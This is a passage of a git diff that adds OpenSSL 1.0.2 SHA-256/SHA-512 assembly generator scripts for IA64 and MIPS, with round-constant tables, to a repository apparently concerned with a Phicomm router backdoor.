+	shrp	X[ 8]=X[ 8],X[ 7],56
+	shrp	X[ 7]=X[ 7],X[ 6],56	}
+{ .mii;	shrp	X[ 6]=X[ 6],X[ 5],56
+	shrp	X[ 5]=X[ 5],X[ 4],56	};;
+{ .mii;	shrp	X[ 4]=X[ 4],X[ 3],56
+	shrp	X[ 3]=X[ 3],X[ 2],56	}
+{ .mii;	shrp	X[ 2]=X[ 2],X[ 1],56
+	shrp	X[ 1]=X[ 1],X[ 0],56	}
+{ .mib;	shrp	X[ 0]=X[ 0],T1,56	}
+{ .mib;	mov	r8=0
+	mux1	X[15]=X[15],\@rev		// eliminated on big-endian
+	br.many	.L_first16		};;
+.L2byte:
+{ .mmi;	$LDW	X[11]=[input],4*$SZ
+	$LDW	X[10]=[r8],4*$SZ
+	shrp	X[15]=X[15],X[14],48	}
+{ .mmi;	$LDW	X[ 9]=[r9],4*$SZ
+	$LDW	X[ 8]=[r10],4*$SZ
+	shrp	X[14]=X[14],X[13],48	};;
+{ .mmi;	$LDW	X[ 7]=[input],4*$SZ
+	$LDW	X[ 6]=[r8],4*$SZ
+	shrp	X[13]=X[13],X[12],48	}
+{ .mmi;	$LDW	X[ 5]=[r9],4*$SZ
+	$LDW	X[ 4]=[r10],4*$SZ
+	shrp	X[12]=X[12],X[11],48	};;
+{ .mmi;	$LDW	X[ 3]=[input],4*$SZ
+	$LDW	X[ 2]=[r8],4*$SZ
+	shrp	X[11]=X[11],X[10],48	}
+{ .mmi;	$LDW	X[ 1]=[r9],4*$SZ
+	$LDW	X[ 0]=[r10],4*$SZ
+	shrp	X[10]=X[10],X[ 9],48	};;
+{ .mii;	$LDW	T1=[input]
+	shrp	X[ 9]=X[ 9],X[ 8],48
+	shrp	X[ 8]=X[ 8],X[ 7],48	}
+{ .mii;	shrp	X[ 7]=X[ 7],X[ 6],48
+	shrp	X[ 6]=X[ 6],X[ 5],48	};;
+{ .mii;	shrp	X[ 5]=X[ 5],X[ 4],48
+	shrp	X[ 4]=X[ 4],X[ 3],48	}
+{ .mii;	shrp	X[ 3]=X[ 3],X[ 2],48
+	shrp	X[ 2]=X[ 2],X[ 1],48	}
+{ .mii;	shrp	X[ 1]=X[ 1],X[ 0],48
+	shrp	X[ 0]=X[ 0],T1,48	}
+{ .mib;	mov	r8=0
+	mux1	X[15]=X[15],\@rev		// eliminated on big-endian
+	br.many	.L_first16		};;
+.L3byte:
+{ .mmi;	$LDW	X[ 9]=[r9],4*$SZ
+	$LDW	X[ 8]=[r10],4*$SZ
+	shrp	X[15]=X[15],X[14],40	};;
+{ .mmi;	$LDW	X[ 7]=[input],4*$SZ
+	$LDW	X[ 6]=[r8],4*$SZ
+	shrp	X[14]=X[14],X[13],40	}
+{ .mmi;	$LDW	X[ 5]=[r9],4*$SZ
+	$LDW	X[ 4]=[r10],4*$SZ
+	shrp	X[13]=X[13],X[12],40	};;
+{ .mmi;	$LDW	X[ 3]=[input],4*$SZ
+	$LDW	X[ 2]=[r8],4*$SZ
+	shrp	X[12]=X[12],X[11],40	}
+{ .mmi;	$LDW	X[ 1]=[r9],4*$SZ
+	$LDW	X[ 0]=[r10],4*$SZ
+	shrp	X[11]=X[11],X[10],40	};;
+{ .mii;	$LDW	T1=[input]
+	shrp	X[10]=X[10],X[ 9],40
+	shrp	X[ 9]=X[ 9],X[ 8],40	}
+{ .mii;	shrp	X[ 8]=X[ 8],X[ 7],40
+	shrp	X[ 7]=X[ 7],X[ 6],40	};;
+{ .mii;	shrp	X[ 6]=X[ 6],X[ 5],40
+	shrp	X[ 5]=X[ 5],X[ 4],40	}
+{ .mii;	shrp	X[ 4]=X[ 4],X[ 3],40
+	shrp	X[ 3]=X[ 3],X[ 2],40	}
+{ .mii;	shrp	X[ 2]=X[ 2],X[ 1],40
+	shrp	X[ 1]=X[ 1],X[ 0],40	}
+{ .mib;	shrp	X[ 0]=X[ 0],T1,40	}
+{ .mib;	mov	r8=0
+	mux1	X[15]=X[15],\@rev		// eliminated on big-endian
+	br.many	.L_first16		};;
+.L4byte:
+{ .mmi;	$LDW	X[ 7]=[input],4*$SZ
+	$LDW	X[ 6]=[r8],4*$SZ
+	shrp	X[15]=X[15],X[14],32	}
+{ .mmi;	$LDW	X[ 5]=[r9],4*$SZ
+	$LDW	X[ 4]=[r10],4*$SZ
+	shrp	X[14]=X[14],X[13],32	};;
+{ .mmi;	$LDW	X[ 3]=[input],4*$SZ
+	$LDW	X[ 2]=[r8],4*$SZ
+	shrp	X[13]=X[13],X[12],32	}
+{ .mmi;	$LDW	X[ 1]=[r9],4*$SZ
+	$LDW	X[ 0]=[r10],4*$SZ
+	shrp	X[12]=X[12],X[11],32	};;
+{ .mii;	$LDW	T1=[input]
+	shrp	X[11]=X[11],X[10],32
+	shrp	X[10]=X[10],X[ 9],32	}
+{ .mii;	shrp	X[ 9]=X[ 9],X[ 8],32
+	shrp	X[ 8]=X[ 8],X[ 7],32	};;
+{ .mii;	shrp	X[ 7]=X[ 7],X[ 6],32
+	shrp	X[ 6]=X[ 6],X[ 5],32	}
+{ .mii;	shrp	X[ 5]=X[ 5],X[ 4],32
+	shrp	X[ 4]=X[ 4],X[ 3],32	}
+{ .mii;	shrp	X[ 3]=X[ 3],X[ 2],32
+	shrp	X[ 2]=X[ 2],X[ 1],32	}
+{ .mii;	shrp	X[ 1]=X[ 1],X[ 0],32
+	shrp	X[ 0]=X[ 0],T1,32	}
+{ .mib;	mov	r8=0
+	mux1	X[15]=X[15],\@rev		// eliminated on big-endian
+	br.many	.L_first16		};;
+.L5byte:
+{ .mmi;	$LDW	X[ 5]=[r9],4*$SZ
+	$LDW	X[ 4]=[r10],4*$SZ
+	shrp	X[15]=X[15],X[14],24	};;
+{ .mmi;	$LDW	X[ 3]=[input],4*$SZ
+	$LDW	X[ 2]=[r8],4*$SZ
+	shrp	X[14]=X[14],X[13],24	}
+{ .mmi;	$LDW	X[ 1]=[r9],4*$SZ
+	$LDW	X[ 0]=[r10],4*$SZ
+	shrp	X[13]=X[13],X[12],24	};;
+{ .mii;	$LDW	T1=[input]
+	shrp	X[12]=X[12],X[11],24
+	shrp	X[11]=X[11],X[10],24	}
+{ .mii;	shrp	X[10]=X[10],X[ 9],24
+	shrp	X[ 9]=X[ 9],X[ 8],24	};;
+{ .mii;	shrp	X[ 8]=X[ 8],X[ 7],24
+	shrp	X[ 7]=X[ 7],X[ 6],24	}
+{ .mii;	shrp	X[ 6]=X[ 6],X[ 5],24
+	shrp	X[ 5]=X[ 5],X[ 4],24	}
+{ .mii;	shrp	X[ 4]=X[ 4],X[ 3],24
+	shrp	X[ 3]=X[ 3],X[ 2],24	}
+{ .mii;	shrp	X[ 2]=X[ 2],X[ 1],24
+	shrp	X[ 1]=X[ 1],X[ 0],24	}
+{ .mib;	shrp	X[ 0]=X[ 0],T1,24	}
+{ .mib;	mov	r8=0
+	mux1	X[15]=X[15],\@rev		// eliminated on big-endian
+	br.many	.L_first16		};;
+.L6byte:
+{ .mmi;	$LDW	X[ 3]=[input],4*$SZ
+	$LDW	X[ 2]=[r8],4*$SZ
+	shrp	X[15]=X[15],X[14],16	}
+{ .mmi;	$LDW	X[ 1]=[r9],4*$SZ
+	$LDW	X[ 0]=[r10],4*$SZ
+	shrp	X[14]=X[14],X[13],16	};;
+{ .mii;	$LDW	T1=[input]
+	shrp	X[13]=X[13],X[12],16
+	shrp	X[12]=X[12],X[11],16	}
+{ .mii;	shrp	X[11]=X[11],X[10],16
+	shrp	X[10]=X[10],X[ 9],16	};;
+{ .mii;	shrp	X[ 9]=X[ 9],X[ 8],16
+	shrp	X[ 8]=X[ 8],X[ 7],16	}
+{ .mii;	shrp	X[ 7]=X[ 7],X[ 6],16
+	shrp	X[ 6]=X[ 6],X[ 5],16	}
+{ .mii;	shrp	X[ 5]=X[ 5],X[ 4],16
+	shrp	X[ 4]=X[ 4],X[ 3],16	}
+{ .mii;	shrp	X[ 3]=X[ 3],X[ 2],16
+	shrp	X[ 2]=X[ 2],X[ 1],16	}
+{ .mii;	shrp	X[ 1]=X[ 1],X[ 0],16
+	shrp	X[ 0]=X[ 0],T1,16	}
+{ .mib;	mov	r8=0
+	mux1	X[15]=X[15],\@rev		// eliminated on big-endian
+	br.many	.L_first16		};;
+.L7byte:
+{ .mmi;	$LDW	X[ 1]=[r9],4*$SZ
+	$LDW	X[ 0]=[r10],4*$SZ
+	shrp	X[15]=X[15],X[14],8	};;
+{ .mii;	$LDW	T1=[input]
+	shrp	X[14]=X[14],X[13],8
+	shrp	X[13]=X[13],X[12],8	}
+{ .mii;	shrp	X[12]=X[12],X[11],8
+	shrp	X[11]=X[11],X[10],8	};;
+{ .mii;	shrp	X[10]=X[10],X[ 9],8
+	shrp	X[ 9]=X[ 9],X[ 8],8	}
+{ .mii;	shrp	X[ 8]=X[ 8],X[ 7],8
+	shrp	X[ 7]=X[ 7],X[ 6],8	}
+{ .mii;	shrp	X[ 6]=X[ 6],X[ 5],8
+	shrp	X[ 5]=X[ 5],X[ 4],8	}
+{ .mii;	shrp	X[ 4]=X[ 4],X[ 3],8
+	shrp	X[ 3]=X[ 3],X[ 2],8	}
+{ .mii;	shrp	X[ 2]=X[ 2],X[ 1],8
+	shrp	X[ 1]=X[ 1],X[ 0],8	}
+{ .mib;	shrp	X[ 0]=X[ 0],T1,8	}
+{ .mib;	mov	r8=0
+	mux1	X[15]=X[15],\@rev	};;	// eliminated on big-endian
+
+.align	32
+.L_first16:
+{ .mmi;		$LDW	K=[Ktbl],$SZ
+		add	A=A,r8			// H+=Sigma(0) from the past
+		_rotr	r10=$t1,$Sigma1[0]  }	// ROTR(e,14)
+{ .mmi;		and	T1=F,E
+		andcm	r8=G,E
+	(p16)	mux1	X[14]=X[14],\@rev   };;	// eliminated on big-endian
+{ .mmi;		and	T2=A,B
+		and	r9=A,C
+		_rotr	r11=$t1,$Sigma1[1]  }	// ROTR(e,41)
+{ .mmi;		xor	T1=T1,r8		// T1=((e & f) ^ (~e & g))
+		and	r8=B,C		    };;
+___
+$t0="t0", $t1="t1", $code.=<<___ if ($BITS==32);
+.align	32
+.L_first16:
+{ .mmi;		add	A=A,r8			// H+=Sigma(0) from the past
+		add	r10=2-$SZ,input
+		add	r11=3-$SZ,input	};;
+{ .mmi;		ld1	r9=[r9]
+		ld1	r10=[r10]
+		dep.z	$t1=E,32,32	}
+{ .mmi;		ld1	r11=[r11]
+		$LDW	K=[Ktbl],$SZ
+		zxt4	E=E		};;
+{ .mii;		or	$t1=$t1,E
+		dep	X[15]=X[15],r9,8,8
+		mux2	$t0=A,0x44	};;	// copy lower half to upper
+{ .mmi;		and	T1=F,E
+		andcm	r8=G,E
+		dep	r11=r10,r11,8,8	};;
+{ .mmi;		and	T2=A,B
+		and	r9=A,C
+		dep	X[15]=X[15],r11,16,16	};;
+{ .mmi;	(p16)	ld1	X[15-1]=[input],$SZ	// prefetch
+		xor	T1=T1,r8		// T1=((e & f) ^ (~e & g))
+		_rotr	r10=$t1,$Sigma1[0] }	// ROTR(e,14)
+{ .mmi;		and	r8=B,C
+		_rotr	r11=$t1,$Sigma1[1] };;	// ROTR(e,18)
+___
+$code.=<<___;
+{ .mmi;		add	T1=T1,H			// T1=Ch(e,f,g)+h
+		xor	r10=r10,r11
+		_rotr	r11=$t1,$Sigma1[2]  }	// ROTR(e,41)
+{ .mmi;		xor	T2=T2,r9
+		add	K=K,X[15]	    };;
+{ .mmi;		add	T1=T1,K			// T1+=K[i]+X[i]
+		xor	T2=T2,r8		// T2=((a & b) ^ (a & c) ^ (b & c))
+		_rotr	r8=$t0,$Sigma0[0]   }	// ROTR(a,28)
+{ .mmi;		xor	r11=r11,r10		// Sigma1(e)
+		_rotr	r9=$t0,$Sigma0[1]   };;	// ROTR(a,34)
+{ .mmi;		add	T1=T1,r11		// T+=Sigma1(e)
+		xor	r8=r8,r9
+		_rotr	r9=$t0,$Sigma0[2]   };;	// ROTR(a,39)
+{ .mmi;		xor	r8=r8,r9		// Sigma0(a)
+		add	D=D,T1
+		mux2	H=X[15],0x44	    }	// mov H=X[15] in sha512
+{ .mib;	(p16)	add	r9=1-$SZ,input		// not used in sha512
+		add	X[15]=T1,T2		// H=T1+Maj(a,b,c)
+	br.ctop.sptk	.L_first16	    };;
+.L_first16_end:
+
+{ .mib;	mov	ar.lc=$rounds-17
+	brp.loop.imp	.L_rest,.L_rest_end-16		}
+{ .mib;	mov	ar.ec=1
+	br.many	.L_rest			};;
+
+.align	32
+.L_rest:
+{ .mmi;		$LDW	K=[Ktbl],$SZ
+		add	A=A,r8			// H+=Sigma0(a) from the past
+		_rotr	r8=X[15-1],$sigma0[0] }	// ROTR(s0,1)
+{ .mmi; 	add	X[15]=X[15],X[15-9]	// X[i&0xF]+=X[(i+9)&0xF]
+		$SHRU	s0=X[15-1],sgm0	    };;	// s0=X[(i+1)&0xF]>>7
+{ .mib;		and	T1=F,E
+		_rotr	r9=X[15-1],$sigma0[1] }	// ROTR(s0,8)
+{ .mib;		andcm	r10=G,E
+		$SHRU	s1=X[15-14],sgm1    };;	// s1=X[(i+14)&0xF]>>6
+// Pair of mmi; splits on Itanium 1 and prevents pipeline flush
+// upon $SHRU output usage
+{ .mmi;		xor	T1=T1,r10		// T1=((e & f) ^ (~e & g))
+		xor	r9=r8,r9
+		_rotr	r10=X[15-14],$sigma1[0] }// ROTR(s1,19)
+{ .mmi;		and	T2=A,B
+		and	r8=A,C
+		_rotr	r11=X[15-14],$sigma1[1] };;// ROTR(s1,61)
+___
+$t0="t0", $t1="t1", $code.=<<___ if ($BITS==32);
+{ .mib;		xor	s0=s0,r9		// s0=sigma0(X[(i+1)&0xF])
+		dep.z	$t1=E,32,32	    }
+{ .mib;		xor	r10=r11,r10
+		zxt4	E=E		    };;
+{ .mii;		xor	s1=s1,r10		// s1=sigma1(X[(i+14)&0xF])
+		shrp	r9=E,$t1,32+$Sigma1[0]	// ROTR(e,14)
+		mux2	$t0=A,0x44	    };;	// copy lower half to upper
+// Pair of mmi; splits on Itanium 1 and prevents pipeline flush
+// upon mux2 output usage
+{ .mmi;		xor	T2=T2,r8
+		shrp	r8=E,$t1,32+$Sigma1[1]}	// ROTR(e,18)
+{ .mmi;		and	r10=B,C
+		add	T1=T1,H			// T1=Ch(e,f,g)+h
+		or	$t1=$t1,E   	    };;
+___
+$t0="A", $t1="E", $code.=<<___ if ($BITS==64);
+{ .mib;		xor	s0=s0,r9		// s0=sigma0(X[(i+1)&0xF])
+		_rotr	r9=$t1,$Sigma1[0]   }	// ROTR(e,14)
+{ .mib;		xor	r10=r11,r10
+		xor	T2=T2,r8	    };;
+{ .mib;		xor	s1=s1,r10		// s1=sigma1(X[(i+14)&0xF])
+		_rotr	r8=$t1,$Sigma1[1]   }	// ROTR(e,18)
+{ .mib;		and	r10=B,C
+		add	T1=T1,H		    };;	// T1+=H
+___
+$code.=<<___;
+{ .mib;		xor	r9=r9,r8
+		_rotr	r8=$t1,$Sigma1[2]   }	// ROTR(e,41)
+{ .mib;		xor	T2=T2,r10		// T2=((a & b) ^ (a & c) ^ (b & c))
+		add	X[15]=X[15],s0	    };;	// X[i]+=sigma0(X[i+1])
+{ .mmi;		xor	r9=r9,r8		// Sigma1(e)
+		add	X[15]=X[15],s1		// X[i]+=sigma0(X[i+14])
+		_rotr	r8=$t0,$Sigma0[0]   };;	// ROTR(a,28)
+{ .mmi;		add	K=K,X[15]
+		add	T1=T1,r9		// T1+=Sigma1(e)
+		_rotr	r9=$t0,$Sigma0[1]   };;	// ROTR(a,34)
+{ .mmi;		add	T1=T1,K			// T1+=K[i]+X[i]
+		xor	r8=r8,r9
+		_rotr	r9=$t0,$Sigma0[2]   };;	// ROTR(a,39)
+{ .mib;		add	D=D,T1
+		mux2	H=X[15],0x44	    }	// mov H=X[15] in sha512
+{ .mib;		xor	r8=r8,r9		// Sigma0(a)
+		add	X[15]=T1,T2		// H=T1+Maj(a,b,c)
+	br.ctop.sptk	.L_rest		    };;
+.L_rest_end:
+
+{ .mmi;	add	A=A,r8			};;	// H+=Sigma0(a) from the past
+{ .mmi;	add	A_=A_,A
+	add	B_=B_,B
+	add	C_=C_,C			}
+{ .mmi;	add	D_=D_,D
+	add	E_=E_,E
+	cmp.ltu	p16,p0=1,num		};;
+{ .mmi;	add	F_=F_,F
+	add	G_=G_,G
+	add	H_=H_,H			}
+{ .mmb;	add	Ktbl=-$SZ*$rounds,Ktbl
+(p16)	add	num=-1,num
+(p16)	br.dptk.many	.L_outer	};;
+
+{ .mib;	add	r8=0*$SZ,ctx
+	add	r9=1*$SZ,ctx		}
+{ .mib;	add	r10=2*$SZ,ctx
+	add	r11=3*$SZ,ctx		};;
+{ .mmi;	$STW	[r8]=A_,4*$SZ
+	$STW	[r9]=B_,4*$SZ
+	mov	ar.lc=lcsave		}
+{ .mmi;	$STW	[r10]=C_,4*$SZ
+	$STW	[r11]=D_,4*$SZ
+	mov	pr=prsave,0x1ffff	};;
+{ .mmb;	$STW	[r8]=E_
+	$STW	[r9]=F_			}
+{ .mmb;	$STW	[r10]=G_
+	$STW	[r11]=H_
+	br.ret.sptk.many	b0	};;
+.endp	$func#
+___
+
+foreach(split($/,$code)) {
+    s/\`([^\`]*)\`/eval $1/gem;
+    s/_rotr(\s+)([^=]+)=([^,]+),([0-9]+)/shrp$1$2=$3,$3,$4/gm;
+    if ($BITS==64) {
+	s/mux2(\s+)([^=]+)=([^,]+),\S+/mov$1 $2=$3/gm;
+	s/mux1(\s+)\S+/nop.i$1 0x0/gm	if ($big_endian);
+	s/(shrp\s+X\[[^=]+)=([^,]+),([^,]+),([1-9]+)/$1=$3,$2,64-$4/gm
+    						if (!$big_endian);
+	s/ld1(\s+)X\[\S+/nop.m$1 0x0/gm;
+    }
+
+    print $_,"\n";
+}
+
+print<<___ if ($BITS==32);
+.align	64
+.type	K256#,\@object
+K256:	data4	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	data4	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	data4	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	data4	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	data4	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	data4	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	data4	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	data4	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	data4	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	data4	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	data4	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	data4	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	data4	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	data4	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	data4	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	data4	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+.size	K256#,$SZ*$rounds
+stringz	"SHA256 block transform for IA64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+print<<___ if ($BITS==64);
+.align	64
+.type	K512#,\@object
+K512:	data8	0x428a2f98d728ae22,0x7137449123ef65cd
+	data8	0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
+	data8	0x3956c25bf348b538,0x59f111f1b605d019
+	data8	0x923f82a4af194f9b,0xab1c5ed5da6d8118
+	data8	0xd807aa98a3030242,0x12835b0145706fbe
+	data8	0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
+	data8	0x72be5d74f27b896f,0x80deb1fe3b1696b1
+	data8	0x9bdc06a725c71235,0xc19bf174cf692694
+	data8	0xe49b69c19ef14ad2,0xefbe4786384f25e3
+	data8	0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
+	data8	0x2de92c6f592b0275,0x4a7484aa6ea6e483
+	data8	0x5cb0a9dcbd41fbd4,0x76f988da831153b5
+	data8	0x983e5152ee66dfab,0xa831c66d2db43210
+	data8	0xb00327c898fb213f,0xbf597fc7beef0ee4
+	data8	0xc6e00bf33da88fc2,0xd5a79147930aa725
+	data8	0x06ca6351e003826f,0x142929670a0e6e70
+	data8	0x27b70a8546d22ffc,0x2e1b21385c26c926
+	data8	0x4d2c6dfc5ac42aed,0x53380d139d95b3df
+	data8	0x650a73548baf63de,0x766a0abb3c77b2a8
+	data8	0x81c2c92e47edaee6,0x92722c851482353b
+	data8	0xa2bfe8a14cf10364,0xa81a664bbc423001
+	data8	0xc24b8b70d0f89791,0xc76c51a30654be30
+	data8	0xd192e819d6ef5218,0xd69906245565a910
+	data8	0xf40e35855771202a,0x106aa07032bbd1b8
+	data8	0x19a4c116b8d2d0c8,0x1e376c085141ab53
+	data8	0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
+	data8	0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
+	data8	0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
+	data8	0x748f82ee5defb2fc,0x78a5636f43172f60
+	data8	0x84c87814a1f0ab72,0x8cc702081a6439ec
+	data8	0x90befffa23631e28,0xa4506cebde82bde9
+	data8	0xbef9a3f7b2c67915,0xc67178f2e372532b
+	data8	0xca273eceea26619c,0xd186b8c721c0c207
+	data8	0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
+	data8	0x06f067aa72176fba,0x0a637dc5a2c898a6
+	data8	0x113f9804bef90dae,0x1b710b35131c471b
+	data8	0x28db77f523047d84,0x32caab7b40c72493
+	data8	0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
+	data8	0x4cc5d4becb3e42b6,0x597f299cfc657e2a
+	data8	0x5fcb6fab3ad6faec,0x6c44198c4a475817
+.size	K512#,$SZ*$rounds
+stringz	"SHA512 block transform for IA64, CRYPTOGAMS by <appro\@openssl.org>"
+___
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-mips.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-mips.pl
new file mode 100644
index 0000000..b468cfb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-mips.pl
@@ -0,0 +1,510 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA2 block procedures for MIPS.
+
+# October 2010.
+#
+# SHA256 performance improvement on MIPS R5000 CPU is ~27% over gcc-
+# generated code in o32 build and ~55% in n32/64 build. SHA512 [which
+# for now can only be compiled for MIPS64 ISA] improvement is modest
+# ~17%, but it comes for free, because it's same instruction sequence.
+# Improvement coefficients are for aligned input.
+
+# September 2012.
+#
+# Add MIPS[32|64]R2 code (>25% less instructions).
+
+######################################################################
+# There is a number of MIPS ABI in use, O32 and N32/64 are most
+# widely used. Then there is a new contender: NUBI. It appears that if
+# one picks the latter, it's possible to arrange code in ABI neutral
+# manner. Therefore let's stick to NUBI register layout:
+#
+($zero,$at,$t0,$t1,$t2)=map("\$$_",(0..2,24,25));
+($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7,$s8,$s9,$s10,$s11)=map("\$$_",(12..23));
+($gp,$tp,$sp,$fp,$ra)=map("\$$_",(3,28..31));
+#
+# The return value is placed in $a0. Following coding rules facilitate
+# interoperability:
+#
+# - never ever touch $tp, "thread pointer", former $gp [o32 can be
+#   excluded from the rule, because it's specified volatile];
+# - copy return value to $t0, former $v0 [or to $a0 if you're adapting
+#   old code];
+# - on O32 populate $a4-$a7 with 'lw $aN,4*N($sp)' if necessary;
+#
+# For reference here is register layout for N32/64 MIPS ABIs:
+#
+# ($zero,$at,$v0,$v1)=map("\$$_",(0..3));
+# ($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+# ($t0,$t1,$t2,$t3,$t8,$t9)=map("\$$_",(12..15,24,25));
+# ($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7)=map("\$$_",(16..23));
+# ($gp,$sp,$fp,$ra)=map("\$$_",(28..31));
+#
+$flavour = shift || "o32"; # supported flavours are o32,n32,64,nubi32,nubi64
+
+if ($flavour =~ /64|n32/i) {
+	$PTR_ADD="dadd";	# incidentally works even on n32
+	$PTR_SUB="dsub";	# incidentally works even on n32
+	$REG_S="sd";
+	$REG_L="ld";
+	$PTR_SLL="dsll";	# incidentally works even on n32
+	$SZREG=8;
+} else {
+	$PTR_ADD="add";
+	$PTR_SUB="sub";
+	$REG_S="sw";
+	$REG_L="lw";
+	$PTR_SLL="sll";
+	$SZREG=4;
+}
+$pf = ($flavour =~ /nubi/i) ? $t0 : $t2;
+#
+# <appro@openssl.org>
+#
+######################################################################
+
+$big_endian=(`echo MIPSEL | $ENV{CC} -E -`=~/MIPSEL/)?1:0 if ($ENV{CC});
+
+for (@ARGV) {	$output=$_ if (/^\w[\w\-]*\.\w+$/);	}
+open STDOUT,">$output";
+
+if (!defined($big_endian)) { $big_endian=(unpack('L',pack('N',1))==1); }
+
+if ($output =~ /512/) {
+	$label="512";
+	$SZ=8;
+	$LD="ld";		# load from memory
+	$ST="sd";		# store to memory
+	$SLL="dsll";		# shift left logical
+	$SRL="dsrl";		# shift right logical
+	$ADDU="daddu";
+	$ROTR="drotr";
+	@Sigma0=(28,34,39);
+	@Sigma1=(14,18,41);
+	@sigma0=( 7, 1, 8);	# right shift first
+	@sigma1=( 6,19,61);	# right shift first
+	$lastK=0x817;
+	$rounds=80;
+} else {
+	$label="256";
+	$SZ=4;
+	$LD="lw";		# load from memory
+	$ST="sw";		# store to memory
+	$SLL="sll";		# shift left logical
+	$SRL="srl";		# shift right logical
+	$ADDU="addu";
+	$ROTR="rotr";
+	@Sigma0=( 2,13,22);
+	@Sigma1=( 6,11,25);
+	@sigma0=( 3, 7,18);	# right shift first
+	@sigma1=(10,17,19);	# right shift first
+	$lastK=0x8f2;
+	$rounds=64;
+}
+
+$MSB = $big_endian ? 0 : ($SZ-1);
+$LSB = ($SZ-1)&~$MSB;
+
+@V=($A,$B,$C,$D,$E,$F,$G,$H)=map("\$$_",(1,2,3,7,24,25,30,31));
+@X=map("\$$_",(8..23));
+
+$ctx=$a0;
+$inp=$a1;
+$len=$a2;	$Ktbl=$len;
+
+sub BODY_00_15 {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+my ($T1,$tmp0,$tmp1,$tmp2)=(@X[4],@X[5],@X[6],@X[7]);
+
+$code.=<<___ if ($i<15);
+	${LD}l	@X[1],`($i+1)*$SZ+$MSB`($inp)
+	${LD}r	@X[1],`($i+1)*$SZ+$LSB`($inp)
+___
+$code.=<<___	if (!$big_endian && $i<16 && $SZ==4);
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	wsbh	@X[0],@X[0]		# byte swap($i)
+	rotr	@X[0],@X[0],16
+#else
+	srl	$tmp0,@X[0],24		# byte swap($i)
+	srl	$tmp1,@X[0],8
+	andi	$tmp2,@X[0],0xFF00
+	sll	@X[0],@X[0],24
+	andi	$tmp1,0xFF00
+	sll	$tmp2,$tmp2,8
+	or	@X[0],$tmp0
+	or	$tmp1,$tmp2
+	or	@X[0],$tmp1
+#endif
+___
+$code.=<<___	if (!$big_endian && $i<16 && $SZ==8);
+#if defined(_MIPS_ARCH_MIPS64R2)
+	dsbh	@X[0],@X[0]		# byte swap($i)
+	dshd	@X[0],@X[0]
+#else
+	ori	$tmp0,$zero,0xFF
+	dsll	$tmp2,$tmp0,32
+	or	$tmp0,$tmp2		# 0x000000FF000000FF
+	and	$tmp1,@X[0],$tmp0	# byte swap($i)
+	dsrl	$tmp2,@X[0],24
+	dsll	$tmp1,24
+	and	$tmp2,$tmp0
+	dsll	$tmp0,8			# 0x0000FF000000FF00
+	or	$tmp1,$tmp2
+	and	$tmp2,@X[0],$tmp0
+	dsrl	@X[0],8
+	dsll	$tmp2,8
+	and	@X[0],$tmp0
+	or	$tmp1,$tmp2
+	or	@X[0],$tmp1
+	dsrl	$tmp1,@X[0],32
+	dsll	@X[0],32
+	or	@X[0],$tmp1
+#endif
+___
+$code.=<<___;
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	xor	$tmp2,$f,$g			# $i
+	$ROTR	$tmp0,$e,@Sigma1[0]
+	$ADDU	$T1,$X[0],$h
+	$ROTR	$tmp1,$e,@Sigma1[1]
+	and	$tmp2,$e
+	$ROTR	$h,$e,@Sigma1[2]
+	xor	$tmp0,$tmp1
+	$ROTR	$tmp1,$a,@Sigma0[0]
+	xor	$tmp2,$g			# Ch(e,f,g)
+	xor	$tmp0,$h			# Sigma1(e)
+
+	$ROTR	$h,$a,@Sigma0[1]
+	$ADDU	$T1,$tmp2
+	$LD	$tmp2,`$i*$SZ`($Ktbl)		# K[$i]
+	xor	$h,$tmp1
+	$ROTR	$tmp1,$a,@Sigma0[2]
+	$ADDU	$T1,$tmp0
+	and	$tmp0,$b,$c
+	xor	$h,$tmp1			# Sigma0(a)
+	xor	$tmp1,$b,$c
+#else
+	$ADDU	$T1,$X[0],$h			# $i
+	$SRL	$h,$e,@Sigma1[0]
+	xor	$tmp2,$f,$g
+	$SLL	$tmp1,$e,`$SZ*8-@Sigma1[2]`
